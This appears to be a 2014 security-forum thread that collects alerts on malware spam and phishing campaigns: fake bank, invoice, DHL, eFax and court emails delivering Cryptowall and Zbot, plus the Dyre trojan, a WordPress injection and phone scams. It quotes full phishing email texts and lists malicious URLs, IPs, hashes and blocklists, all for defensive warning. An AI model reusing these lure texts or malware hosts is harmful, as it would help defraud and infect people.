Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/bhlive_ticketsd.png

> https://www.virustotal.com/en-gb/file/72caf25189d16d81915d78c494cf5b7c93f45b254cb25e31526f7b5b546a9e83/analysis/1410164460/
___

Fake RBS "Important Docs" SPAM - again ...
- http://blog.dynamoo.com/2014/09/rbs-importat-docs-spam.html
8 Sep 2014 - "The Royal Bank of Scotland has been spoofed several times recently, this latest fake spam contains a payload that looks like it might be Cryptowall.
Date: Mon, 8 Sep 2014 15:00:22 +0100 [10:00:22 EDT]
From: Vicente Mcneill [Vicente@rbs .co.uk]
Subject: Important Docs
Please review attached documents regarding your account.
Tel: 01322 929655
Fax: 01322 499190
email: Vicente@ rbs .co.uk ...

Attached is an archive RBS_Account_Documents.zip containing a malicious executable RBS_Account_Documents.scr which has a detection rate at VirusTotal of 4/53*... analysis shows that it attempts to download components from the following locations:
95.141.37.158/0809uk1/NODE01/0/51-SP3/0/
95.141.37.158/0809uk1/NODE01/1/0/0/
95.141.37.158/0809uk1/NODE01/41/5/4/
bullethood.com/ProfilePics/0809uk1.zip
95.141.37.158 is SeFlow.it Internet Services, Italy. bullethood .com is on a shared server at GoDaddy. The malware also appears to be attempting to connect to 94.23.250.88 (OVH, France).
Recommended blocklist:
bullethood .com
95.141.37.158
94.23.250.88"
* https://www.virustotal.com/en-gb/file/f9046c5fbdddee04dd8fbf6e187a630b88a961243b20933afcb0e36091847d59/analysis/1410183105/
___

Cryptowall ransomware ...
- http://arstechnica.com/security/2014/09/ransomware-going-strong-despite-takedown-of-gameover-zeus/
Sept 7 2014 - "... Within a week of the takedown of Gameover Zeus and Cryptolocker, a surge of spam with links to a Cryptolocker copycat, known as Cryptowall, resulted in a jump in ransomware infections, states a report released last week by security-services firm Dell Secureworks*. Cryptowall first appeared in November 2013, and spread slowly, but the group behind the program were ready to take advantage of the vacuum left by the downfall of its predecessor. Being prepared paid off: In six months, the Cryptowall group infected nearly 625,000 systems, and even though only 0.27% of victims paid, the group still made $1.1 million, according to data from a command-and-control server discovered by Dell Secureworks..."
* http://www.secureworks.com/cyber-threat-intelligence/threats/cryptowall-ransomware/
___

‘Dyre’ malware goes after Salesforce users
- https://blog.malwarebytes.org/cyber-crime/2014/09/dyre-malware-goes-after-salesforce-users/
Sep 8, 2014 - "San Francisco-based company Salesforce, well-known for its cloud-based Customer Relationship Management (CRM) software, emailed a security advisory to its customers late Friday.
Copy of the email sent by Salesforce:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/salesforce_email.png
The threat known as Dyre was originally spotted by security firm CSIS* and by PhishMe** which also had uncovered the new malware earlier in June. Back then, the threat was aimed at banks and other financial institutions, something very reminiscent of other banking Trojans such as Zeus and its variants. But researchers discovered that the malware is now capable of capturing login credentials from Salesforce users by -redirecting- them through a phishing website. Dyre will initially infect users through some form of social-engineering, typically with an email that contains a malicious attachment. Once on the system, the malware can act as a man-in-the-middle and intercept every single keystroke. To be clear, this is not a vulnerability with Salesforce or its website, but rather a type of malware that leverages compromised end-point machines... This type of attack could mean there is a new trend on the horizon, one that goes after Software as a Service (SaaS) users. Businesses increasingly rely on third-party software providers for their needs because it can be a cheaper option without all the headaches of doing it yourself. For example, instead of managing their own email server, companies will use Office365 or similar cloud-based email solutions. Banking credentials are still the bread-and-butter for the majority of cyber-crooks because they can be immediately used. But the data harvested from many SaaS applications also holds a tremendous value for those willing to invest the time to dig in and find bits of information that could lead to a large compromise in a top-tier business. There is no silver bullet to defend against these threats but once again a healthy balance of end-user education about phishing scams and proper end-point security solutions will go a long way. Data exfiltration is one of the most important issues of 2014 with a growing number of businesses being affected. The effects on companies’ brands and trust of their customers can be very damaging and long lasting, not to mention the potential lawsuits that often follow."
* https://www.csis.dk/en/csis/news/4262/

** http://phishme.com/project-dyre-new-rat-slurps-bank-credentials-bypasses-ssl/
___

Fake "PAYMENT SLIP" SPAM - with an encrypted .7z archive
- http://blog.dynamoo.com/2014/09/payment-slip-spam-comes-with-encrypted.html
8 Sep 2014 - "This spam comes with a malicious attachment:
From: daniel mo [danielweiche002@ gmail .com]
Subject: PAYMENT SLIP
Signed by: gmail .com
Thanks for your last message,
We remitted 30% prepayment today amounting to 51,300USD against your invoice INV332831 as was agreed with you by our purchasing agent. Please check the attached invoice and the payment slip and correspond your account information. You will receive payment in your account after a few days.
Please confirm the receipt below,
kindly use this password {121212} to view attachment for our payment slip;
Thanks,
Daniel
Accounts Assistant
67752222
64472801
Zenia Singapore Pte Ltd

In order to deal with the attachment new order.7z, you'll need something capable of dealing with .7z files (e.g. 7-Zip). Inside the archive is a malicious executable new order.scr which has a VirusTotal detection rate of 5/54*. I have not been able to analyse the malware any further than this."
* https://www.virustotal.com/en-gb/file/b1277d881f6504e668eabdaaced21f66618b2a0cd25ad94fc1e1b1a31806f363/analysis/1410186462/
___

RBC Royal Bank Phish - and PDF malware
- http://myonlinesecurity.co.uk/received-new-secure-message-rbc-royal-bank-customer-service-phishing/
8 Sep 2014 - "'You have received a new secure message from RBC Royal Bank Customer Service' pretending to come from RBC Royal Bank Customer Service <securemessage@ rbc .com> is an attempt to -scam- you and get your bank log on details. It also is trying to infect you and is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email is particularly devious, evil and crafty as it sends you to a site that at first glance you think is a phishing site (if you are unwise enough to click any of the links in the email). However that site also has a hidden iframe that tries to download some malware to the computer if you have a vulnerable version of Java. Then if that isn’t enough when you fill in the log in details on the page the buttons on the page appear to link to the genuine RBC bank site so hovering over the links will fool you into thinking that you are on the genuine RBC site:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/rbc.png
... then the sign in button leads you to this webpage where any of the links or the buttons download what appears to be a genuine PDF file that looks blank. That file is a malformed PDF with a script virus embedded that will infect you. This file 09.08.14report.pdf has a current VirusTotal detection rate of 5/55*. These emails contain a genuine PDF file that is malformed and contains a script virus and can infect you with no action on your part by simply previewing the PDF in your browser or in the PDF reader..."
* https://www.virustotal.com/en/file/8c966250202f464973929a31886b6ba8d4454425f9348000833091f9d9e8c59a/analysis/1410199439/

- http://threattrack.tumblr.com/post/96988594103/rbc-royal-bank
Sep 8, 2014 - "Subjects Seen:
You have received a new secure message from RBC Royal Bank Customer Service
Typical e-mail details:
You have received a secure message
This is an automated message sent by Royal Bank Secure Messaging Server.
The link above will only be active until: 09/10/2014
Please click here or follow this link : royalbank.com/cgi-bin/rbaccess/rbcgi3m01
Help is available 24 hours a day by email at secure.emailhelp @rbcroyalbank.com
If you have concerns about the validity of this message, please contact the sender directly. For questions about Royal Bank’s e-mail encryption service, please contact technical support at 1-800-769-2511.
First time users - will need to register before reading the Secure Message.

Malicious URLs:
halilbekrek .com/TUTOS/libs/excel/install6.exe
66.235.98.169/rbc.com/webapp/ukv0/signin/logon.php
66.235.98.169/rbc.com/webapp/ukv0/signin/report/09.08.14report.pdf
84.45.53.45/rbc.com/webapp/ukv0/signin/logon.php
84.45.53.45/rbc.com/webapp/ukv0/signin/message.html
84.45.53.45/rbc.com/webapp/ukv0/signin/report/09.08.14report.pdf

Malicious File Name and MD5:
install6.exe (e3fbc7b3bf11f09c5ee33b1e1b45f81b)
09.08.14report.pdf (ecddafa699814679552d2bf95fc087e5)
OfigGigg.dat (85d42ccc12301bbda27abf4c0b7eb7ff)

66.235.98.169: https://www.virustotal.com/en/ip-address/66.235.98.169/information/

84.45.53.45: https://www.virustotal.com/en/ip-address/84.45.53.45/information/

Tagged: RBC, Vawtrak, CVE-2013-2729
___

Fake Tcn Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/tcn-invoice-n265588248042e-fake-pdf-malware/
8 Sep 2014 - "'Tcn Invoice # N265588248042E' pretending to come from Katharine Norwood <Katharine.Norwood@ advanced-ornamentation .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Good morning...
I requested an invoice yesterday; on the invoice it shows a charge of $585.15 although on my credit card statement it shows a charge of $185.13. Can you please advise on what the total should be and if it is for the amount of $185.13 can you please provide an invoice with that amount.
Thank you.
Katharine Norwood
Administrative Assistant
San Diego, CA 92135
205 840-2913

8 September 2014: Invoice.zip ( 48 kb) : Extracts to Invoice.pdf.scr
Current Virus total detections: 4/55*. This 'Tcn Invoice # N265588248042E' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/52c344196cf767035c404995bb4237677540b2f17e815c4d5433f7b35ffa4d4d/analysis/1410198304/
___

Twitter Phish SPAM: “Strange Rumors About You”
- https://blog.malwarebytes.org/fraud-scam/2014/09/twitter-phishing-spamrun-strange-rumors-about-you/
Sep 8, 2014 - "... an ongoing Twitter spam attack which is sending potential victims to phishing pages via a Tumblr -redirect-. Compromised Twitter accounts and / or bots are sending variations of the below to Twitter users:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/twitterspam1.jpg
We’ve seen some 200+ messages sent in the last ten minutes, and this attack has been ongoing for at least six hours. Here’s the Tumblr -spam- blog which is redirecting to the fake Twitter login, and the -fake- login itself:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/twitterspam2.jpg
...
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/twitterspam3.jpg
The -fake- page reads:
“Your current session has ended.
For security purposes your [sic] were forcibly signed out. You need to verify your Twitter account, please relogin.”
Twitter users should -avoid- signing into Twitter via any of the links being sent around, and always check the URL to ensure they’re entering their credentials in the right place."

211.154.136.106: https://www.virustotal.com/en/ip-address/211.154.136.106/information/

:fear: :mad:

AplusWebMaster
2014-09-09, 15:47
FYI...

Fake Bill.com Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/bill-com-invoice-paid-fake-pdf-malware/
9 Sep 2014 - "'Bill.com Invoice has been paid' pretending to come from The Bill .com Team <notificationonly@ hq.bill .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[ Bill .com image ]
Hi,
Thank you for payment to Bill.com. The credit/debit card you have on file with us was successfully charged $115.33 for the billing period 08/01/14-09/01/14.
The Statement for this account is now available for viewing. Please find it attached to this email.
Have questions? Sign in at our website, then contact support.
Thank you,
The Bill .com Team
Please do not respond to this email. This e-mail was sent from a notification-only e-mail address.

9 September 2014: bill-d59f78596bfa79e01898cf9d0e645b99328028d597e9005146787f09435a01016270d6ffc5d69ec27901.zip ( 486 kb):
Extracts to BILL_ID_895634523945258345873645763459879876432985763298563253245.pdf.exe Current Virus total detections: 28/55*. This Bill .com Invoice has been paid is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e3c2b761ce6a188e9669480d52368f3e865499a06813d939c23ad915d49cba62/analysis/1410252379/
____

“Google dorking“ ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/google-dorking-waking-up-web-admins-everywhere/
Sep 9, 2014 - "Last July, the US Department of Homeland Security warned of a new kind of criminal attack: “Google dorking“*. This refers to asking Google for things they have found via special search operators... Google finds things online using a program that accesses web sites: the Google web crawler, called the Googlebot. When the Googlebot examines the web and finds “secret” data, it adds it to Google’s database just like any other kind of information... suppose your company’s HR representative left a spreadsheet with -confidential- employee data -online- . Since it’s open for everyone to access, the crawler sees and indexes it. From then on, even though it might have been hard to find before, a simple – or not so simple – Google search will point any attacker to it. Google never stored the actual data (unless it was cached), it just made it easier to find. This kind of “attack” has been around for as long as search engines have been around. There are whole books devoted to the subject of “Google dorking”, which is more commonly known as “Google hacking”. Books have been published about it for years, and even the NSA has a 643-page manual that describes in detail how to use Google’s search operators to find information. The warning – as ridiculous as it might seem – has some merit... finding information that has been carelessly left out in the open is not strictly criminal: at the end of the day, it was out there for Googlebot to find. Google can’t be blamed for finding what has been left public; it’s the job of web admins to know what is and isn’t on their servers wide open for the world to see. It’s not just confidential documents that are open to the public, either. As we noted as far back as 2013, industrial control systems could be found via Google searches. Even more worryingly, embedded web servers (such as those used in web cameras) are found online all the time with the Shodan search engine.
This latter threat was first documented in 2011, which means that IT administrators have had three years to shut down these servers, but it’s still a problem to this day. In short: this problem has been around for a while, but given that it’s still around, an official warning from the DHS is a useful reminder to web admins everywhere: perform “Google dorking” against your own servers frequently, looking for things that shouldn’t be there. If you don’t, somebody else will and their intentions might not be so pure..."
* https://publicintelligence.net/feds-google-dorking/
___

Fake Sage Outdated Invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/sage-outdated-invoice-fake-pdf-malware/
9 Sep 2014 - "'Outdated Invoice' pretending to come from Sage Account & Payroll <invoice@ sage .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[Sage logo image ]
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link bellow or click here to view/download your account invoice:
... Account?432532=Invoice_090914.zip
If we hold any information about you which is incorrect or if there are any changes to your details please let us know by so that we can keep our records accurate and up to date. If you would like to update your records or see a copy of the information that we hold about you, you can contact us at Data Protection Officer, Sage (UK) Ltd, North Park, Newcastle-upon-Tyne, NE13 9AA or by email to digital@sage.com. If you request a copy of your information you will need to pay a statutory fee which is currently £10.
The contents of this email and any attachments are confidential...

9 September 2014: invoice_090914.zip ( 18kb) : Extracts to invoice_090914.scr
Current Virus total detections: 4/55*. This 'Outdated Invoice' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e7b04220bc9c21161ba5f6aac8cd7bc2c7951aa80fc68b2d196cb9da7a78dc8d/analysis/1410267601/

- http://blog.dynamoo.com/2014/09/sage-outdated-invoice-spam.html
9 Sep 2014
"Recommended blocklist:
95.141.37.158 ..."
(More detail at the dynamoo URL above.)

95.141.37.158: https://www.virustotal.com/en/ip-address/95.141.37.158/information/
___

Fake NatWest Invoice SPAM - PDF malware
- http://myonlinesecurity.co.uk/important-new-account-invoice-fake-pdf-malware/
9 Sep 2014 - "'Important – New account invoice' pretending to come from NatWest Invoice <invoice@ natwest .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
[NatWest logo image]
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here or follow the link below...

9 September 2014: invoice_090914.zip ( 18kb) : Extracts to invoice_090914.scr
Current Virus total detections: 4/55*. This 'Important – New account invoice' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e7b04220bc9c21161ba5f6aac8cd7bc2c7951aa80fc68b2d196cb9da7a78dc8d/analysis/1410267601/
___

Fake Worker’s Compensation SPAM – word.doc malware
- http://myonlinesecurity.co.uk/hmcts-workers-compensation-appeal-fake-word-doc-malware/
9 Sep 2014 - "'HMC&TS Worker’s Compensation Appeal' pretending to come from HM Courts and Tribunals Service <submit.wjq@ courtsni .gov.uk> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... So far today I have seen several subjects for this email:
HMC&TS Worker’s Compensation Appeal
Worker’s Compensation Summons
HM Courts & Tribunals Service Summons
HM Courts & Tribunals Service
All the emails are very similar, but will have different courts or tribunals listed and different dates, case numbers and tribunal members. The faked sender will always be the same name as the recipient of the email with a few random letters after the name... Email reads:
Worker’s Compensation Appeal Tribunal
Decision # 502
Board Direction To Rehear Decision #695
Claim No.: 2504=5704
Date of Original Notice of Appeal: June 10, 2014
Date Received at The Tribunal: June 19, 2014
Date of Board Direction to Rehear: August 11, 2014
Received: August 20, 2014
Date of Documentary Review by Appeal Committee: August 23, 2014
Date of Decision: September 6, 2014
To Whom It May Concern,
Your Corporation (named Respondent)
Appears to be in default because of its failure to comply with the Administrative Law Judge’s Prehearing Order without decent cause, and such default by Respondent constitutes an admission of all facts alleged in the Complaint and a waiver of Respondent’s right to contest such factual allegations. Respondent violated the section 9(6), paragraph B13(1) of the Jobseekers Act 1995.
We recommend you to download a copy of original Complaint at Tribunal in attachment below...

9 September 2014: Copy68789.zip (66kb): Extracts to Copy of original Complaint at Tribunal.docx.exe
Current Virus total detections: 1/55*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper Microsoft Word .doc instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c765b5ba935a3c872388185940ca89570a1710e89148ce25caf1a54148079800/analysis/1410269102/

- http://threattrack.tumblr.com/post/97055148048/hm-courts-tribunals-service-spam
Sep 9, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4cb469a9e44e608eacef08eba6109111/tumblr_inline_nbmytoLcAX1r6pupn.png

Malicious File Name and MD5:
Copy4855.zip (854ADF297E8B1D79BA0E744F90AFDE50)
Copy of original Complaint at Tribunal.docx.exe (6D9BDE90B81C064ACA5ED994BC8A981A)

Tagged: HM Courts & Tribunals, Kuluoz
___

Hackers throw 25 malware variants at Apple Mac OS X
- http://www.theinquirer.net/inquirer/news/2363995/hackers-throw-25-malware-variants-at-apple-mac-os-x
Sep 9 2014 - "... 25 varieties of malware, some of which are being used in targeted attacks, warns security firm F-Secure. F-Secure reported uncovering the malware variants in its Threat Report H1 2014*, claiming it discovered the first 20 attack tools earlier this year..."
* http://www.f-secure.com/weblog/archives/00002741.html
Sep 8, 2014

:mad: :fear:

AplusWebMaster
2014-09-10, 14:17
FYI...

Fake DHL invoice SPAM
- http://blog.dynamoo.com/2014/09/geir-myklebust-dhl-no.html
10 Sep 2014 - "Geir Myklebust is a real employee for DHL in Norway, but neither he nor DHL are responsible for this spam run in any way (their systems have NOT been breached either). Instead, it contains a malicious attachment and it should simply be deleted.
From: Geir Myklebust (DHL NO) [Geir.Myklebust@ dhl .com]
Date: 10 September 2014 10:35
Subject: FW: customer acct. no.: 4690086 - invoice 0257241 needs to be paid
Dear Sir.
The attached invoice from Villmarksmessen 2014 has still not been settled.
Please advise as soon as possible.
Thank you and regards,
Geir
Med vennlig hilsen/ Kind Regards
Geir Myklebust
Product Manager, Avd. Trade Fairs & Events
DHL Global Forwarding (Norway) AS
Avd. Trade Fairs & Events
Messeveien 14
2004 Lillestrøm ...

Attached is a ZIP file of various different names (e.g. invoice_0257241.zip), containing a malicious executable file invoice_3466198.exe which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report** shows an attempted connection to voladora .com/Imagenes/qaws.cab which is currently coming up with a socket error. I would recommend that you block access to that domain. Further analysis is pending..."
* https://www.virustotal.com/en-gb/file/779955dd6a5da605f2432449bf1edc35e356a251cf43f3cbfda704a26cac5038/analysis/1410342283/

** http://camas.comodo.com/cgi-bin/submit?file=779955dd6a5da605f2432449bf1edc35e356a251cf43f3cbfda704a26cac5038

"UPDATE: a second malicious binary is doing the rounds, this time with a detection rate of 2/53***..."
*** https://www.virustotal.com/en-gb/file/febd053fdafbc097eedbacac3e0f97d912f7925ddab0dfc90a32895dac35fbdd/analysis/1410353017/

92.43.17.6: https://www.virustotal.com/en/ip-address/92.43.17.6/information/

- http://myonlinesecurity.co.uk/fw-customer-acct-186588-invoice-9782264-needs-paid-fake-pdf-malware/
10 Sep 2014
- https://www.virustotal.com/en/file/febd053fdafbc097eedbacac3e0f97d912f7925ddab0dfc90a32895dac35fbdd/analysis/1410350810/
___

Fake Overdue invoice SPAM – doc malware
- http://myonlinesecurity.co.uk/overdue-invoice-1197419584-fake-doc-malware/
10 Sep 2014 - "'Overdue invoice #1197419584' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Good afternoon,
I was hoping to hear from you by now. May I have payment on invoice #1197419584 today please, or would you like a further extension?
Best regards,
Cherish Schaunaman
+07540 61 15 69
... or like this one:
This email contains an invoice file in attachment.

10 September 2014 : bill_2014-09-10_09-16-23_1197419584.arj :
Extracts to: bill_2014-09-10_09-16-23_1197419584.exe
Current Virus total detections: 6/55*
Alternative version 10 September 2014 : Invoice4777_2C7.zip :
Extracts to: attachment_scaned.doc .exe
Current Virus total detections: 2/54**
This 'Overdue invoice #1197419584' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper Microsoft Word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4c6d8f5ad6ff6f35be8b2fe921fc65619ba5708b5a0597a6929fd3bc3f36aabb/analysis/1410342531/

** https://www.virustotal.com/en/file/877eab31951bb48139f0ec592ce906ff3891a74f078af494eeb8ccbc9d913b52/analysis/1410341816/
___

'Outstanding Warrant' Phone SCAMS
- http://www.hoax-slayer.com/outstanding-warrant-phone-scams.shtml
Sep 10, 2014 - "Scammers posing as law-enforcement officers are cold-calling people and tricking them into paying over the phone to resolve supposedly outstanding warrants. The scammers warn victims that, if they don't pay the requested fee, police may come to their home and arrest them... The scammers are reportedly quite skilled at impersonating police officers and are often able to convince victims that they are legitimate. When victims call back on the number provided, the scammers may identify their 'office' as a seemingly legitimate entity such as the 'County Warrants Department'. This simple -ruse- may further convince victims that the scammer's claims are true... This type of -scam- is certainly nothing new and has been around in various forms for many years... a flurry of reports from several US states suggests that these scammers are currently quite active. The scammers are also using variations of the old jury duty phone scam to steal money from victims. Police will -never- call you and demand an immediate payment to resolve an outstanding warrant. If you receive such a suspect call, do -not- give the caller any personal and financial information and do -not- comply with their instructions. If in doubt, call your local police to check. Do -not- use a phone number provided by the caller. Find a number for police in a local phone directory..."
___

Malvertisements - YouTube, Amazon and Yahoo
- http://www.computerworld.com/article/2604303/malicious-advertising-hits-amazon-youtube-and-yahoo.html
Sep 9, 2014 - "Malicious advertisements have popped up on websites such as YouTube, Amazon and Yahoo, part of a sophisticated campaign to spread malware, Cisco said*... When encountered, the malicious advertisements cause the user to be -redirected- to a different website, which triggers a download based on whether the computer is running Windows or Apple's OS X... Cisco didn't identify the advertising network that is serving the malicious advertisements. Although ad networks try to filter out malicious ones, occasionally bad ones slip in, which for a high-traffic site means a large pool of potential victims... Some of the malicious ads were served on youtube.com, amazon.com and ads.yahoo.com, Pelkmann wrote. All told, 74 domains were serving the ads. When a victim is -redirected- by one of the ads, the computer downloads a piece of malware with a unique checksum, making it harder for security software to detect. The download may also contain legitimate software such as a media player. To be infected, the user must be convinced to open the file. 'The attackers are purely relying on social engineering techniques in order to get the user to install the software package,' Pelkmann wrote. 'No drive-by exploits are being used thus far'..."
* http://blogs.cisco.com/security/kyle-and-stan/

:fear: :mad:

AplusWebMaster
2014-09-11, 14:55
FYI...

Fake job offer SPAM - llcinc .net
- http://blog.dynamoo.com/2014/09/llc-inc-llcincnet-fake-job-offer.html
11 Sep 2014 - "This -fake- company's name looks like it has been designed to be hard to find on Google. The so-called LLC INC using the domain llcinc .net does -not- exist.
Date: Wed, 10 Sep 2014 19:51:50 -0400 [09/10/14 19:51:50 EDT]
From: LLC INC
Reply-To: recruiter@ llcinc .net
Subject: EMPLOYMENT OFFER
Hello,
Good day to you overthere we will like to inform you that our company is currently
opening an opportunity for employment if you are interested please do reply with your resume
to recruiter@ llcinc .net
Thanks
Management LLC INC

This so-called job is going to be something like a money mule, parcel mule or some other illegal activity. The domain llcinc .net was registered just a few days ago with -fake- details... There is no website. The email originates from 209.169.222.37; the mail headers indicate that this is probably a compromised email server mail .swsymphony .org.
Avoid."
___

Fake eFax SPAM leads to Cryptowall
- http://blog.dynamoo.com/2014/09/efax-spam-leads-to-cryptowall.html
11 Sep 2014 - "Yet another -fake- eFax spam. I mean really I cannot remember the last time someone sent me a (real) fax...
From: eFax [message@ inbound .efax .com]
Date: 11 September 2014 20:35
Subject: eFax message from "unknown" - 1 page(s), Caller-ID: 1-865-537-8935
Fax Message [Caller-ID: 1-865-537-8935
You have received a 1 page fax at Fri, 12 Sep 2014 02:35:44 +0700.
* The reference number for this fax is atl_did1-1400166434-52051792384-154.
Click here to view this fax using your PDF reader.
Please visit www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or your service.
Thank you for using the eFax service! ...

... the link in the message goes somewhere bad, in this case it downloads a ZIP file from cybercity-game .com/game/Documents.zip which unzips to a malicious executable Documents.scr which has a pretty low VirusTotal detection rate of 2/55*. The ThreatTrack report** clearly identifies this as Cryptowall and identifies that it either downloads data from or posts data... The 111.exe has a much wider detection rate of 22/53*** and according to the ThreatTrack analysis of that binary there is some sort of network connection... I would recommend blocking the following:
188.165.204.210
193.19.184.20
193.169.86.151
goodbookideas .com
mtsvp .com
suspendedwar .com "
* https://www.virustotal.com/en-gb/file/687c7d8030b9f15bd2ef857116ef8c0c6fe83aa998ff32dab406beb0d4e759c2/analysis/1410467960/

** http://www.dynamoo.com/files/analysis_2567_79b1f47c0dfd99f974d2920a381ad91f.pdf

*** https://www.virustotal.com/en-gb/file/5db8207e1891b01b84c987f8065c2f646cbcceae9ff5af5198a05f75766e8c39/analysis/1410468901/
___

Malicious WordPress injection sending to 178.62.254.78 and 176.58.100.98
- http://blog.dynamoo.com/2014/09/malicious-wordpress-injection-sending.html
11 Sep 2014 - "There is currently some sort of injection attack against WordPress sites that is injecting code into the site's .js files. Not so unusual... except that the payload site in the file changes every half hour or so... The site mentioned in the IFRAME is the one that keeps -changing- so presumably there is either something running on the compromised WordPress site, or there is some other mechanism for the bad guys to update the details... All these subdomains are hijacked from legitimate domains using AFRAID.ORG nameservers, and are hosted on 178.62.254.78 (Digital Ocean, Netherlands). These then pass the victim onto another domain in the format... blocking the following IPs may give you better protection:
176.58.100.98
178.62.254.78 "

176.58.100.98: https://www.virustotal.com/en-gb/ip-address/176.58.100.98/information/

178.62.254.78: https://www.virustotal.com/en-gb/ip-address/178.62.254.78/information/
___

Fake Employee Important Address UPDATE/SPAM – PDF malware
- http://myonlinesecurity.co.uk/employees-important-address-update-fake-pdf-malware/
11 Sep 2014 - "'To All Employee’s – Important Address UPDATE' which pretends to come from Administrator at your own domain is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
To All Employee’s:
The end of the year is approaching and we want to ensure every employee receives their W-0 to the correct address. Verify that the address is correct... If changes need to be made, contact HR .. Administrator ...

11 September 2014: Documents.zip: Extracts to: Documents.scr
Current Virus total detections: 0/53* ... another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/687c7d8030b9f15bd2ef857116ef8c0c6fe83aa998ff32dab406beb0d4e759c2/analysis/1410456657/

- http://blog.dynamoo.com/2014/09/to-all-employees-important-address.html
11 Sep 2014 - "This -fake- HR spam leads to a malicious ZIP file:
From: Administrator [administrator@ victimdomain .com]
Date: 11 September 2014 22:25
Subject: To All Employee's - Important Address UPDATE
To All Employee's:The end of the year is approaching and we want to ensure every employee receives their W-5 to the correct address. Verify that the address is correct... If changes need to be made, contact HR...

The link in the email goes to the same site as described in this earlier post*, which means that the payload is Cryptowall."
* http://blog.dynamoo.com/2014/09/efax-spam-leads-to-cryptowall.html
___

Fake picture or video SPAM – jpg malware
- http://myonlinesecurity.co.uk/new-picture-video-message-fake-jpg-malware/
11 Sep 2014 - "'A new picture or video' message pretending to come from getmyphoto@ vodafone .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The attachment file names are so far all the same and it extracts to a fake Windows shortcut file .pif. Even setting show file extensions will not show the .pif extension in Windows 8 and the unzipped file will look like a genuine Windows shortcut, so you need to be especially wary and cautious. See below:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/pif-not-showing.png
The email looks like:
You have received a picture message from mobile phone number +447586595142 picture
Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service

There is a second version of this email doing the rounds today. Instead of an attachment it has a link to a compromised/ infected/newly created malware pushing site where it automatically tries to download the malware in a zip file.
You have received a picture message from mobile phone number +447557523496 click here to view picture message
Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service

... there will be hundreds of different sites. The zip was 90837744-2014_481427.zip which extracts to 90837744-2014_481427.scr which has the same # and detection rate as the pif file earlier submitted to virus total*

11 September 2014: IMG_00005_09112014.jpeg.zip : Extracts to: IMG_00005_09112014.jpeg.pif
Current Virus total detections:4/53** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper jpg file instead of the .pif ( windows shortcut) file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1425dcfbe06fa76c7b1e491e4573afedd2a867e50650b9ad70e90ae872024821/analysis/1410430034/

** https://www.virustotal.com/en/file/1425dcfbe06fa76c7b1e491e4573afedd2a867e50650b9ad70e90ae872024821/analysis/1410427007/
___

Fake 'new order' SPAM – PDF malware
- http://myonlinesecurity.co.uk/new-order-fake-pdf-malware/
